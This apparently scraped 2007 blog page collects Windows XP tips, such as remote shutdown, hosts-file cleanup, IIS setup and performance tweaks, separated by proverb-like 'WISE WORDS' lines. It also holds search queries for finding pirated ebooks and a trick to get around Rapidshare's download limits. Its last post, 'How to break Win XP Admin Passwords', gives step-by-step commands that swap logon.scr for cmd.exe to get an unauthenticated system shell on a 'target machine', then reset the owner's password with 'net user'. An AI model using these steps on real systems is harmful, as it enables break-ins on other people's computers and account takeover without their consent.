+("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +apache

Find a particular eBook file:

Try this query:

allinurl: +(rar|chm|zip|pdf|tgz) hacking

WISE WORDS:Blessed are the meek, for they shall inherit the earth.

Rapidshare Timelimit

Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server, a different IP address. You can do this one of multiple ways.

Requesting a new IP address from your ISP server.

Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.

ipconfig /flushdns
ipconfig /release
ipconfig /renew

5. Erase your cookies in whatever browser you are using.
6. Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

WISE WORDS:Common sense is not so common.

Monday, August 27, 2007

Remote Shutdown

XP PRO has a lot of fun utilities. One of the most useful ones I have found to date is the ability to remotely reboot a PC. There are 2 ways of doing this. You will need to have admin access to the PC to preform these actions. That being said, here is the first way to do it:

Right click my computer, choose manage.
Highlight the Computer Management (Local) then click on Action, choose connect to another computer.
In the window that opens fill in the machine name of the PC you want to connect to and click ok.
Once connected right click on Computer Management (Remote machine name) and choose properties.
Go to the "Advanced" tab and click the Settings button under Start up and recovery.
Click on the Shutdown button.
Under action choose what you want to do (you can log off current user, shut down, restart, or power down. you can also choose if you want to force all applications to close, close hung apps, or wait for all apps to close by themselves).

The second way... Remember dos... that good old thing. Open up a command prompt and enter in the following:

%windir%\System32\shutdown.exe -r -m \\Machinename. The command prompt has more switches and options. I highly suggest using shutdown.exe /? to see all the possibilities.

WISE WORDS:Clear statement is argument.

Recover a Corrupted System File

If an essential Windows file gets whacked by a virus or otherwise corrupted, restore it from the Windows CD. Search the CD for the filename, replacing the last character with an underscore; for example, Notepad.ex_. If it's found, open a command prompt and enter the command EXPAND, followed by the full pathname of the file and of the desired destination: EXPAND D:\SETUP\NOTEPAD.EX_ C:\Windows\NOTEPAD.EXE. If either pathname contains any spaces, surround it with double quotes.

If the file isn't found, search on the unmodified filename. It will probably be inside a CAB file, which Win XP treats as a folder. Simply right-drag and copy the file to the desired location. In other Windows platforms, search for a file matching *.cab that contains the filename. When the search is done, open a command prompt and enter EXTRACT /L followed by the desired location, the full pathname of the CAB file, and the desired filename; for example: EXTRACT /L C:\Windows D:\I386\ Notepad.exe. Again, if the destination or CAB file pathname contains spaces, surround it with double quotes.

WISE WORDS:Blessed are the merciful, for they shall obtain mercy.

Problem With Internet Navigation, Clean Host File

We have seen a large number of computers coming in with problems navigation on the Internet. Also unable to go to Windows update and virus update sites. Here is a quick fix that also seems to speed navigation up some.

Just for safety create a copy of the file before making changes.


C:\windows\system32\drivers\etc\ (Windows XP)

C:\I386 (Windows 2000)

Open the host with notepad.

remove all entries bellow localhost

then save and close.

WISE WORDS:Better be three hours soon than one minute late.

Installing iis On Windows Xp Pro

If you are running Windows XP Professional on your computer you can install Microsoft's web server, Internet Information Server 5.1 (IIS) for free from the Windows XP Pro installation CD and configure it to run on your system by following the instructions below: -

1. Place the Windows XP Professional CD-Rom into your CD-Rom Drive.

2. Open 'Add/Remove Windows Components' found in 'Add/Remove Programs' in the 'Control Panel'.

3. Place a tick in the check box for 'Internet Information Services (IIS)' leaving all the default installation settings intact.

4. Once IIS is installed on your machine you can view your home page in a web browser by typing 'http://localhost' (you can substitute 'localhost' for the name of your computer) into the address bar of your web browser. If you have not placed your web site into the default directory you should now be looking at the IIS documentation.

5. If you are not sure of the name of your computer right-click on the 'My Computer' icon on your desktop, select 'Properties' from the shortcut menu, and click on the 'Computer Name' tab.

6. Your default web directory to place your web site in is 'C:\Inetpub\wwwroot', but if you don't want to over write the IIS documentation found in this directory you can set up your own virtual directory through the 'Internet Information Services' console.

7. The 'Internet Information Services' console can be found in the 'Administration Tools' in the 'Control Panel' under 'Performance and Maintenance', if you do not have the control panel in Classic View.

8. Double-click on the 'Internet Information Services' icon.

9. Once the 'Internet Information Services' console is open you will see any IIS web services you have running on your machine including the SMTP server and FTP server, if you chose to install them with IIS.

10. To add a new virtual directory right click on 'Default Web Site' and select 'New', followed by 'Virtual Directory', from the drop down list.

WISE WORDS:Begin, not with a programme, but with a deed.

Sunday, August 26, 2007

Performance Increase Through My Computer

1: Start > Right Click on My Computer and select properties.
2: Click on the "Advanced" tab
3: See the "Perfomance" section? Click "Settings"
4: Disable all or some of the following:

Fade or slide menus into view
Fade or slide ToolTips into view
Fade out menu items after clicking
Show Shadows under menus
Slide open combo boxes
Slide taskbar buttons
Use a background image for each folder type
Use common tasks in folders

There, now Windows will still look nice and perform faster!!!!!!!

WISE WORDS:Complaints are only lies in court cloths.

Ntfs Cluster Size, better harddrive performance

Cluster is an allocation unit. If you create file lets say 1 byte in size, at least one cluster should be allocated on FAT file system. On NTFS if file is small enough, it can be stored in MFT record itself without using additional clusters. When file grows beyond the cluster boundary, another cluster is allocated. It means that the bigger the cluster size, the more disk space is wasted, however, the performance is better.

So if you have a large hard drive & don't mind wasting some space, format it with a larger cluster size to gain added performance.

The following table shows the default values that Windows NT/2000/XP uses for NTFS formatting:

Drive size
(logical volume) Cluster size Sectors
512 MB or less 512 bytes 1
513 MB - 1,024 MB (1 GB) 1,024 bytes (1 KB) 2
1,025 MB - 2,048 MB (2 GB) 2,048 bytes (2 KB) 4
2,049 MB and larger 4,096 bytes (4 KB) 8
However, when you format the partition manually, you can specify cluster size 512 bytes, 1 KB, 2 KB, 4 KB, 8 KB, 16 KB, 32 KB, 64 KB in the format dialog box or as a parameter to the command line FORMAT utility.

The performance comes thew the bursts from the hard drive. by having a larger cluster size, you affectively have a larger chunk of data sent to ram rather than having to read multiple smaller chunks of the same data.

WISE WORDS:Charity begins at home.

Manage Saved Ie Passwords

When you enter a user name and password, Internet Explorer may ask if you want it to remember the password. Click on Yes and it will automatically fill in the password next time you enter that user name. But if you check Don't offer to remember any more passwords, then whether you click on Yes or No, you won't be prompted again. To recover this feature, launch Internet Options from IE's Tools menu, select the Content tab, click on the AutoComplete button, and check Prompt me to save passwords.

To delete an individual saved password entry, go to the log-on box on a Web page and double-click. Your saved AutoComplete entries will drop down. Use the arrow keys to scroll to the one you want to delete, and press the Del key.

WISE WORDS:Beasts leave ingratitude to man.

Remove the Links folder in IE Favorites

If you're one of the many people that NEVER use the "links" folder in your favorites and can't keep windows for re-creating it. Here's how:

[Start] [Run] [Regedit]

Registry Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Internet Explorer\ Toolbar

Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.

Data Type: REG_SZ [String Value] // Value Name:


Value Data: [Set the String Value to a blank string]

Open Internet Explorer and manually delete the Links folder from Favorites Menu. The Links folder will not be recreated. Exit Registry and Reboot.

WISE WORDS:Boldness is an ill-keeper of promise.

How to break Win XP Admin Passwords

This trick will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Win XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Win XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Win XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Win XP Home and Pro.
Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on w* a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun!!!!!!!!

WISE WORDS:Age measures also experience.